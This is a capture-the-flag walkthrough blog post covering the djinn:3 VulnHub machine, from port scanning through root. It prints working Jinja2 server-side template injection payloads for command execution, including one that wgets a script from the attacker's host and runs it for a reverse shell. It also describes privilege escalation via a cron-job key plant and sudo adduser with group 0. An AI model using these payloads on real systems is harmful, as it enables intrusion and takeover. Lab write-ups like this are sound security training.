djinn:3 vulnhub Walkthrough

I am back with another article which is going to be full of new methods and priv. esc. techniques , The only reason I was not writing any blog was this VM ( djinn3 , a very good VM from vulnhub) , and finally after a lot of failure I got root on this VM , Okay so lets start .


walkthrough



IP of the target : 192.168.1.55

As usual I started with nmap scan to find open ports and services running in the system using the command


nmap -sC -sV -Pn 192.168.1.55

I have got so many ports open , may be port 80 can help me with the enumeration so lets start from it.

okay we have a website on port 80 and I tried to visit on every page specified in the nav. bar but got nothing , now its time for directory bruteforce , I personally like wfuzz because of its cleaner interface (you can use any tool you want) .


wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 --hc 404 http://192.168.1.55/FUZZ

but got nothing instead of /images with a code 301 and /~checkout~ with code 403 then I changed my wordlist to /dirb/big.txt and still I got nothing except /~sys~ which is also forbidden , I don't know if ~checkout~ and ~sys~ directory are going to be useful for me or not , So I proceed with the next port 5000


we have ticketing software , most interesting line I found is "Under Development" which shows that this web app can have security issues , I clicked on open link and found another webpage with get parameter "id "

umm smells like SQL injection but it was not , I tried a lot but got nothing :(

okay next port we have is 31337 , I tried connecting to this port using nc

I tried almost every common username and password but none of them worked , then I start searching on the internet for some common username and password and found one with

username => guest

password => guest

and yes this worked , I was feeling so dumb at this point , How can I forgot such an easy password :(

anyways lets continue with the application we have on port 31337

I can perform so many options here , I started with close ( close an existing ticket)

I tried to close some non existing ticket with id 1234 and got no output next I tried with some valid ticket id I found on port 5000 as 2973 and after this I again visit the page on port 5000 and yes this ticket id is actually deleted.

next option I tried was open a new ticket

again I visited the page on port 5000 and found a new ticket id with title "check" , means this function is working too , I tried including some file name likes /etc/passwd to check if we can get LFI or RFI here , but got nothing , then after spending a lot of time with this application I got nothing .

I again checked nmap scan and found this line 5000/tcp open http Werkzeug

searching on google about this revealed useful information .

umm that was a big hint for me , means the whole application is developed using flask and flask is vulnerable to SSTI attack (Server side template injection attack) and found a GitHub link something like PayloadsAllTheThings and after working on it I found that this application is using jinja2 because if we give input as {{7*'7'}} then output will be 7777777

again I opened the webapp on port 5000 and clicked on link and I got this result.


I was on the right path but "some payloads doesn't work exactly the way are written" , so after a lot of tries to get RCE from SSTI I succeed with payload ,


{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

now I just have to pop the shell , and without any further checking I assumed that this system has php installed in it and I uploaded pentestmonkey reverse shell in /tmp directory and wasted almost 10mins to figure out why this php script is not executing , now I changed my command to


{{config.__class__.__init__.__globals__['os'].popen('ls /usr/bin/').read()}}

and using this I found that python is installed so I can use a python script to pop a shell ( again I was feeling so dumb) , how can I forget to check if php is there or not .


{{config.__class__.__init__.__globals__['os'].popen('wget http://192.168.1.103:8000/exp.py -O /tmp/exp.py').read()}}

opened the webpage on port 5000 and after I clicked on link the my python script is saved to /tmp/ directory

next I started a listener on port 1234 and changed the payload as


{{config.__class__.__init__.__globals__['os'].popen('python /tmp/exp.py').read()}}

and after clicking on link I got the reverse shell :)

popped up the reverse shell :)

and after some enumeration I found two important files in /opt/ directory .

I transferred these files in my local system and de-compiled them with uncompyle6 and as a result I got two .py files .

and after reading the code for so many times I found some important piece of codes


Content of file1 =>

Content of file2 =>

now after understanding these two codes I tried to run pspy in target machine and found that a cronjob is running as user saint ( we have three users , saint mzfr , jack)

and according to the python code I created a json file in /tmp directory with name ****.config.json which will download id_rsa.pub keys to the directory I specified ( so I tried with /home/saint/.ssh/authorized_keys) and yes it worked and now I can get access to user saint .


as we can see that server received a response code 200 , means I am on the right path now with the help of command ssh saint@192.168.1.55 I was in as user saint

now after getting shell of user saint I checked for user privileges using the command sudo -l and found this

it means user saint can add a user , so if we remember the adduser command options then there is a option to specify the gid , So I used the commad

sudo -u root /usr/sbin/adduser yash --gid 0


now after spending some time with the system , I found that I can read /etc/sudoers file and found this interesting thing .

mean we need to create a new user with name jason , okay I did the same thing after changing back to user saint .

now from the sudoers file I know that user jason can run some command without any password as user root, so I take help of gtfobins and finally got root

and this completed our challenge , if you like the walkhthrough then please consider donating us to keep the website advertisement free :)


NOTE : I have blurred most of the code of those two python files and also the name of json file in /tmp directory because I don't want that anybody can get root in just 10-15mins , So my main motive to hide them is I want from you to #try_harder

Recent Posts

See All

Website change notice

As you all know that our website is providing walkthrough of different challenges from different platforms and without any advertisement but due to some funds issue we can't continue this website :( S

Subscribe to HacLabs newsletter

Get priority notification on the release of the latest articles.

  • YouTube
  • Twitter
  • Instagram
  • Linkedin

© 2020 by HacLabs.